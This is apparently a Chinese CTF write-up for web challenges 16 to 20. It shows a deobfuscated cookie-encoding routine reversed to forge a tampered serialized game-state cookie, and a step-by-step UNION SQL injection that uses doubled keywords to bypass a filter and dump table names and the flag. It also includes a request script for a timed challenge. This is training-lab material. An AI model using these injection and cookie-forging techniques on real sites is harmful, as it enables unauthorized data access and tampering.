web16
学会如来神掌应该就能打败他了吧
题目地址
进入江湖,抓个包,发现三个js。
script.js base.js md5.js
分别打开后发现,md5.js、base.js没有什么异常,打开script.js后发现有packet加密。
我们先进行解密。下面是解密代码
<script>
a=62;
function encode() {
var code = document.getElementById('code').value;
code = code.replace(/[\r\n]+/g, '');
code = code.replace(/'/g, "\\'");
var tmp = code.match(/\b(\w+)\b/g);
tmp.sort();
var dict = [];
var i, t = '';
for(var i=0; i<tmp.length; i++) {
if(tmp[i] != t) dict.push(t = tmp[i]);
}
var len = dict.length;
var ch;
for(i=0; i<len; i++) {
ch = num(i);
code = code.replace(new RegExp('\\b'+dict[i]+'\\b','g'), ch);
if(ch == dict[i]) dict[i] = '';
}
document.getElementById('new_code').value = "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}("
+ "'"+code+"',"+a+","+len+",'"+ dict.join('|')+"'.split('|'),0,{}))";
}
function num(c) {
return(c<a?'':num(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36));
}
function run() {
eval(document.getElementById('code').value);
}
function decode() {
var code = document.getElementById('code').value;
code = code.replace(/^eval/, '');
document.getElementById('new_code').value = eval(code);
}
</script>
<div>JS文件加密解密</div>
<div>原脚本</div>
<textarea id="code" cols=80 rows=10>
</textarea>
<div>加密/解密后脚本</div>
<textarea id="new_code" cols=80 rows=10>
</textarea>
<div>
<input type=button onclick=encode() value=编码>
<input type=button onclick=run() value=执行>
<input type=button onclick=decode() value=解码>
</div>
把这段代码,写入decode.html,浏览器打开。
解密完成之后,再进行一下格式化。
在线工具地址:https://tool.oschina.net/codeformat/js/
function getCookie(cname) {
var name = cname + "=";
var ca = document.cookie.split(';');
for (var i = 0; i < ca.length; i++) {
var c = ca[i].trim();
if (c.indexOf(name) == 0) return c.substring(name.length, c.length)
}
return ""
}
function decode_create(temp) {
var base = new Base64();
var result = base.decode(temp);
var result3 = "";
for (i = 0; i < result.length; i++) {
var num = result[i].charCodeAt();
num = num ^ i;
num = num - ((i % 10) + 2);
result3 += String.fromCharCode(num)
}
return result3
}
function ertqwe() {
var temp_name = "user";
var temp = getCookie(temp_name);
temp = decodeURIComponent(temp);
var mingwen = decode_create(temp);
var ca = mingwen.split(';');
var key = "";
for (i = 0; i < ca.length; i++) {
if ( - 1 < ca[i].indexOf("flag")) {
key = ca[i + 1].split(":")[2]
}
}
key = key.replace('"', "").replace('"', "");
document.write('<img id="attack-1" src="image/1-1.jpg">');
setTimeout(function() {
document.getElementById("attack-1").src = "image/1-2.jpg"
},
1000);
setTimeout(function() {
document.getElementById("attack-1").src = "image/1-3.jpg"
},
2000);
setTimeout(function() {
document.getElementById("attack-1").src = "image/1-4.jpg"
},
3000);
setTimeout(function() {
document.getElementById("attack-1").src = "image/6.png"
},
4000);
setTimeout(function() {
alert("你使用如来神掌打败了蒙老魔,但不知道是真身还是假身,提交试一下吧!flag{" + md5(key) + "}")
},
5000)
}
分析之后发现,这个游戏是通过cookie来保存角色数据的。
我们分析一下这个js,发现解密cookie的过程为
var temp_name = "user";
var temp = getCookie(temp_name);
temp = decodeURIComponent(temp);
var mingwen = decode_create(temp);
复制解密代码到控制台下,已经解密出明文了。
那么思路来了
修改明文的金币数量→加密为密文→修改cookie→学习如来神掌→得到flag
作者使用的编辑工具为notepad++
第一步修改明文的金币数量:
O:5:“human”:10:{s:8:“xueliang”;i:940;s:5:“neili”;i:837;s:5:“lidao”;i:61;s:6:“dingli”;i:59;s:7:“waigong”;i:0;s:7:“neigong”;i:0;s:7:“jingyan”;i:0;s:6:“yelian”;i:0;s:5:“money”;i:99999999;s:4:“flag”;s:1:“0”;}
第二步加密为密文
既然解密是用 decodeURIComponent 和 decode_create,那么加密只需要逆向着来就好了。
我们发现js中没有encode_create 函数,那么我们就来自己写。
看一下encode_create
function encode_create(temp) {
var base = new Base64();
var result = temp;
var result3 = "";
for (i = 0; i < result.length; i++) {
var num = result[i].charCodeAt();
num = num + ((i % 10) + 2);
num = num ^ i;
result3 += String.fromCharCode(num)
}
result3 = base.encode(result3);
return result3
}
那么反着写decode_create
function decode_create(temp) {
var base = new Base64();
var result = base.decode(temp);
var result3 = "";
for (i = 0; i < result.length; i++) {
var num = result[i].charCodeAt();
num = num ^ i;
num = num - ((i % 10) + 2);
result3 += String.fromCharCode(num)
}
return result3
}
在这里有个坑。
这个base在加密的时候进行了_utf8_encode(input)
而解密的时候,却注释掉了。
那么我们就需要把base加密时的 _utf8_encode(input)
也注释掉,才能保证密文被正确解密。
encode_create完明文之后,再
var miwen = encodeURIComponent(temp2);
console.log(miwen);
明文就被加密好了 。
最后完整代码
<script>
//base64
function Base64() {
// private property
_keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
// public method for encoding
this.encode = function (input) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var i = 0;
//input = _utf8_encode(input);
while (i < input.length) {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
_keyStr.charAt(enc1) + _keyStr.charAt(enc2) +
_keyStr.charAt(enc3) + _keyStr.charAt(enc4);
}
return output;
}
// public method for decoding
this.decode = function (input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
while (i < input.length) {
enc1 = _keyStr.indexOf(input.charAt(i++));
enc2 = _keyStr.indexOf(input.charAt(i++));
enc3 = _keyStr.indexOf(input.charAt(i++));
enc4 = _keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
//output = _utf8_decode(output);
return output;
}
// private method for UTF-8 encoding
_utf8_encode = function (string) {
string = string.replace(/\r\n/g,"\n");
var utftext = "";
for (var n = 0; n < string.length; n++) {
var c = string.charCodeAt(n);
if (c < 128) {
utftext += String.fromCharCode(c);
} else if((c > 127) && (c < 2048)) {
utftext += String.fromCharCode((c >> 6) | 192);
utftext += String.fromCharCode((c & 63) | 128);
} else {
utftext += String.fromCharCode((c >> 12) | 224);
utftext += String.fromCharCode(((c >> 6) & 63) | 128);
utftext += String.fromCharCode((c & 63) | 128);
}
}
return utftext;
}
// private method for UTF-8 decoding
_utf8_decode = function (utftext) {
var string = "";
var i = 0;
var c = c1 = c2 = 0;
while ( i < utftext.length ) {
c = utftext.charCodeAt(i);
if (c < 128) {
string += String.fromCharCode(c);
i++;
} else if((c > 191) && (c < 224)) {
c2 = utftext.charCodeAt(i+1);
string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
i += 2;
} else {
c2 = utftext.charCodeAt(i+1);
c3 = utftext.charCodeAt(i+2);
string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
i += 3;
}
}
return string;
}
}
//getcookie
function getCookie(cname) {
var name = cname + "=";
var ca = document.cookie.split(';');
for (var i = 0; i < ca.length; i++) {
var c = ca[i].trim();
if (c.indexOf(name) == 0) return c.substring(name.length, c.length)
}
return ""
}
function decode_create(temp) {
var base = new Base64();
var result = base.decode(temp);
var result3 = "";
for (i = 0; i < result.length; i++) {
var num = result[i].charCodeAt();
num = num ^ i;
num = num - ((i % 10) + 2);
result3 += String.fromCharCode(num)
}
return result3
}
function encode_create(temp) {
var base = new Base64();
var result = temp;
var result3 = "";
for (i = 0; i < result.length; i++) {
var num = result[i].charCodeAt();
num = num + ((i % 10) + 2);
num = num ^ i;
result3 += String.fromCharCode(num)
}
result3 = base.encode(result3);
return result3
}
function ertqwe() {
var temp_name = "user";
var temp = getCookie(temp_name);
temp = decodeURIComponent(temp);
var mingwen = decode_create(temp);
var ca = mingwen.split(';');
var key = "";
for (i = 0; i < ca.length; i++) {
if ( - 1 < ca[i].indexOf("flag")) {
key = ca[i + 1].split(":")[2]
}
}
key = key.replace('"', "").replace('"', "");
document.write('<img id="attack-1" src="image/1-1.jpg">');
setTimeout(function() {
document.getElementById("attack-1").src = "image/1-2.jpg"
},
1000);
setTimeout(function() {
document.getElementById("attack-1").src = "image/1-3.jpg"
},
2000);
setTimeout(function() {
document.getElementById("attack-1").src = "image/1-4.jpg"
},
3000);
setTimeout(function() {
document.getElementById("attack-1").src = "image/6.png"
},
4000);
setTimeout(function() {
alert("你使用如来神掌打败了蒙老魔,但不知道是真身还是假身,提交试一下吧!flag{" + md5(key) + "}")
},
5000)
}
var b = "O:5:\"human\":10:{s:8:\"xueliang\";i:940;s:5:\"neili\";i:837;s:5:\"lidao\";i:61;s:6:\"dingli\";i:59;s:7:\"waigong\";i:0;s:7:\"neigong\";i:0;s:7:\"jingyan\";i:0;s:6:\"yelian\";i:0;s:5:\"money\";i:99999999;s:4:\"flag\";s:1:\"0\";}"
var temp2 = encode_create(b);
var miwen = encodeURIComponent(temp2);
console.log(miwen);
</script>
保存为html ,浏览器控制台下,看到加密好的密文
UTw7PCxqe3FjcC42OThOjWtSUFYwbm99amlzbG0wI3MeHxgUZ1liZxQMWEFDXl8EdUUOCAMJd016B34WUlFWWTVoATEABHV5P3Z2CmYgPTY5Pj90FSUUaRsfL2ZnYnYhCRMTGRQPQCcHKFIvEShXUlYCGQMbDQ4FXEcXREo%2FBTzBxKbu6fbrB%2BH%2Bps3nsLrP6dCs0LgR8fj1%2F%2B6y3%2B%2FapJ3XnJnkjNPf0NnRjpPD7u%2Fx8%2FH3j4mL98H4hviQzNDbq%2BaDuYb%2Fgur67PVJ
第三步修改cookie
打开burp,拦截修改cookie,发送。
金币已经修改好了。
第四步学习如来神掌
修改好cookie后,去商店一顿购买,学习如来神掌
第五步得到flag
学习好如来神掌,讨伐一下
web17
流量分析,wireshark打开,TCP流追踪得到flag
web18
试探过程如下
id=1’ 回显空白,可能是单引号闭合,字符型注入
id=1’ --+ 回显正常,字符型注入
id=1’ and 1=1 --+ 回显空白,可能过滤了and 或者空格
id=1’anandd 1=1 --+ 回显正常,过滤了and,双写绕过
id=1’ oorrder by 3 --+ 字段数为3
list.php?id=0’ uunionnion seselectlect 1,2,3–+
找到2,3为回显位置
爆数据库
list.php?id=0’ ununionion selselectect 1,2,database() --+
爆表名
list.php?id=0’ ununionion selselectect 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()–+
爆字段
list.php?id=0’ ununionion selselectect 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name=‘flag’–+
取数据
list.php?id=0’ ununionion selselectect 1,2,flag from flag–+
得到flag
web19
做到这里,题目坏掉了,等修复好了之后,再来做。
web20
根据题目介绍,动态GET提交密文,?key=密文,就行了。
写好python脚本,提交就行了
(有时需要提交俩三次,才能得到flag,可能是时间延迟的问题)
下面是完整python代码,由python2 编写。
import requests
url = "http://123.206.31.85:10020/"
r= requests.session()
respond = r.get(url)
respond.encoding='utf-8'
b = respond.text
#print b
key = b[9:42]
#print key
url2 = url + "?key=" + key
respond = r.get(url2)
print url2
respond.encoding='utf-8'
print respond.text